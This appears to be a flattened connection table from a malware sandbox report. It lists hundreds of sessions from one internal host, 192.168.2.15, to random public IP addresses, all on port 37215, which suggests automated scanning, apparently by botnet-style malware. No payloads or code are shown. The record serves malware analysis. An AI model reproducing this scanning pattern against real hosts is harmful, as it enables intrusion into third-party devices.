                                              22322192.168.2.1549324156.186.237.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22323192.168.2.156022031.171.117.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22324192.168.2.1544176156.234.90.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22325192.168.2.1550908222.147.33.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22326192.168.2.1560526222.205.160.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22327192.168.2.1547782122.43.38.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22328192.168.2.1544600102.126.251.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22329192.168.2.1552992155.7.252.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22330192.168.2.1558256222.31.38.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22331192.168.2.1546350222.174.77.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22332192.168.2.1539182181.37.171.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22333192.168.2.1551192156.165.206.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22334192.168.2.1557226181.162.68.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22335192.168.2.1535374121.32.3.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22336192.168.2.1545234138.47.126.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22337192.168.2.1556198181.107.182.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22338192.168.2.1533904138.99.239.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22339192.168.2.154260617.59.208.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22340192.168.2.155613825.138.44.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22341192.168.2.1551422102.100.104.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22342192.168.2.1541442156.135.63.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22343192.168.2.1558244186.86.232.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22344192.168.2.153958231.47.167.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22345192.168.2.1560192222.142.76.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22346192.168.2.155976494.164.222.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22347192.168.2.1557480222.3.195.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22348192.168.2.1545524194.57.183.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22349192.168.2.1548122222.157.202.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22350192.168.2.1534746222.91.49.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22351192.168.2.1548020181.219.168.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22352192.168.2.1553762181.237.236.23837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22353192.168.2.154512237.70.235.9537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22354192.168.2.154215494.174.7.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22355192.168.2.155095094.137.175.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22356192.168.2.1559566197.90.67.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22357192.168.2.1559854157.227.192.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22358192.168.2.1537274190.18.136.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22359192.168.2.1554258181.195.22.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22360192.168.2.1557448156.141.111.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22361192.168.2.1552530121.253.95.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22362192.168.2.1555650138.87.215.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22363192.168.2.1555812122.135.211.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22364192.168.2.1544052121.200.56.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22365192.168.2.1548866181.143.63.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22366192.168.2.1550556181.105.247.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22367192.168.2.155808494.68.140.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22368192.168.2.1538260181.197.192.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22369192.168.2.155902237.65.74.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22370192.168.2.1555102181.133.236.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22371192.168.2.1552042121.39.119.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22372192.168.2.1532774122.238.116.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22373192.168.2.1553438129.231.159.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22374192.168.2.1554184122.238.83.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22375192.168.2.155049441.143.94.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22376192.168.2.1557512121.244.150.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22377192.168.2.1543132197.84.153.3837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22378192.168.2.153965494.112.211.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22379192.168.2.1558018121.67.221.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22380192.168.2.1548710138.83.51.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22381192.168.2.1544576121.68.127.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22382192.168.2.1559246157.212.108.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22383192.168.2.1535642186.189.33.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22384192.168.2.154955694.37.226.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22385192.168.2.1537418138.73.63.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22386192.168.2.1536890156.147.71.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22387192.168.2.1559064197.87.217.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22388192.168.2.1537538138.5.80.23637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22389192.168.2.154443645.94.191.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22390192.168.2.1537762197.199.149.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22391192.168.2.1544452190.186.74.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22392192.168.2.1554404156.250.214.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22393192.168.2.1541740190.99.140.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22394192.168.2.155735631.10.203.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22395192.168.2.155504631.125.94.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22396192.168.2.1552226186.62.69.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22397192.168.2.1546932122.9.100.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22398192.168.2.1553818122.65.38.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22399192.168.2.153728848.92.54.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22400192.168.2.1533532121.13.172.21237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22401192.168.2.154799445.33.80.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22402192.168.2.1540060121.116.127.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22403192.168.2.1550816102.34.71.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22404192.168.2.1552690102.189.59.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22405192.168.2.153692431.247.18.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22406192.168.2.1544918121.42.147.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22407192.168.2.154405031.132.26.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22408192.168.2.154534845.23.249.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22409192.168.2.155803637.116.4.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22410192.168.2.1535432186.218.178.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22411192.168.2.1560916197.55.134.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22412192.168.2.154947441.198.136.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22413192.168.2.1532980157.127.34.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22414192.168.2.154093245.83.190.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22415192.168.2.1558344197.78.140.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22416192.168.2.153423837.173.107.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22417192.168.2.1541678197.191.25.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22418192.168.2.154332645.10.99.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22419192.168.2.154915045.58.194.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22420192.168.2.1539436156.103.95.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22421192.168.2.1534846157.238.0.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22422192.168.2.1553460157.220.32.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22423192.168.2.1552920197.157.126.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22424192.168.2.154003094.160.4.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22425192.168.2.1546412197.167.178.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22426192.168.2.1548340121.146.58.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22427192.168.2.1541930197.109.235.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22428192.168.2.1559298186.72.147.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22429192.168.2.1542696181.137.129.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22430192.168.2.1542194181.84.178.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22431192.168.2.1539936157.251.225.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22432192.168.2.1536808121.237.95.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22433192.168.2.1551954157.117.207.1937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22434192.168.2.154214694.12.175.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22435192.168.2.1547190157.187.1.11237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22436192.168.2.153496894.24.85.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22437192.168.2.154357437.51.214.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22438192.168.2.155019431.109.151.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22439192.168.2.1556872157.195.20.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22440192.168.2.154376894.75.52.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22441192.168.2.1557054197.33.55.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22442192.168.2.1543500197.72.198.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22443192.168.2.155930641.189.76.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22444192.168.2.1550220181.198.143.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22445192.168.2.1538954190.71.117.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22446192.168.2.1534246186.69.218.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22447192.168.2.1538826122.31.51.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22448192.168.2.1550436122.61.133.14737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22449192.168.2.154998237.132.169.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22450192.168.2.1544004122.170.147.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22451192.168.2.1557292186.189.109.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22452192.168.2.1542146222.216.203.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22453192.168.2.1549024190.237.63.1037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22454192.168.2.1556130157.223.132.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22455192.168.2.155589231.102.254.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22456192.168.2.1548076181.220.28.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22457192.168.2.155296445.87.178.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22458192.168.2.1535244222.53.231.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22459192.168.2.1549212157.75.90.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22460192.168.2.1559696122.40.135.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22461192.168.2.1535504157.181.71.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22462192.168.2.1552366186.24.150.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22463192.168.2.1548020197.34.208.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22464192.168.2.1534668186.116.86.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22465192.168.2.1551300138.249.55.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22466192.168.2.1557706121.183.19.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22467192.168.2.154949245.187.142.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22468192.168.2.1544912156.7.22.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22469192.168.2.1560312190.26.249.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22470192.168.2.1533712197.67.254.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22471192.168.2.1552382156.153.12.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22472192.168.2.154937049.196.175.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22473192.168.2.1544016157.211.9.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22474192.168.2.1537872157.217.65.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22475192.168.2.1559860181.100.237.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22476192.168.2.1549742102.138.142.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22477192.168.2.1540808157.224.235.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22478192.168.2.155291294.207.176.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22479192.168.2.1552844157.78.211.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22480192.168.2.1533698181.35.29.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22481192.168.2.1556256186.200.47.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22482192.168.2.1551576102.155.237.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22483192.168.2.1543902186.51.229.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22484192.168.2.1551308197.147.238.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22485192.168.2.1541628156.68.174.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22486192.168.2.1560100121.0.196.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22487192.168.2.1545850186.128.54.537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22488192.168.2.155261237.156.123.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22489192.168.2.1536956197.73.75.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22490192.168.2.1547612121.203.219.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22491192.168.2.153826037.255.122.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22492192.168.2.1553004121.59.241.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22493192.168.2.1549218181.78.232.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22494192.168.2.1547114156.226.179.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22495192.168.2.154001437.65.116.16137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22496192.168.2.155376037.152.252.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22497192.168.2.1560134222.161.34.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22498192.168.2.1556610138.230.247.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22499192.168.2.154911441.139.236.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22500192.168.2.153765037.28.152.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22501192.168.2.154948041.37.216.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22502192.168.2.155168437.169.241.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22503192.168.2.1540710138.119.108.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22504192.168.2.155894837.128.230.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22505192.168.2.1551020186.38.112.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22506192.168.2.154912845.11.135.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22507192.168.2.1547918190.40.43.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22508192.168.2.154572237.199.249.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22509192.168.2.154679241.74.52.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22510192.168.2.153773845.255.193.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22511192.168.2.1548684197.135.122.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22512192.168.2.153812065.221.112.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22513192.168.2.1541508102.21.7.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22514192.168.2.1554432143.181.178.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22515192.168.2.156000694.133.99.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22516192.168.2.1542580222.213.79.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22517192.168.2.155421641.92.144.8337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22518192.168.2.1555188122.178.18.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22519192.168.2.154665437.146.175.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22520192.168.2.154645837.54.117.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22521192.168.2.1546318157.16.170.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22522192.168.2.1536926222.65.229.4437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22523192.168.2.1557544122.221.135.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22524192.168.2.1549726157.246.63.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22525192.168.2.1549360121.36.38.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22526192.168.2.154907237.244.148.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22527192.168.2.1557264186.156.116.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22528192.168.2.1538602102.28.6.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22529192.168.2.1539756121.169.14.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22530192.168.2.155370041.219.87.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22531192.168.2.1546080157.16.56.637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22532192.168.2.153803837.186.69.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22533192.168.2.1549404105.189.70.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22534192.168.2.153452237.114.76.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22535192.168.2.1539130156.199.3.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22536192.168.2.1537640121.95.182.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22537192.168.2.155400094.152.107.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22538192.168.2.1554982222.205.253.4737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22539192.168.2.155861041.226.155.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              22540192.168.2.153331045.28.22.16837215
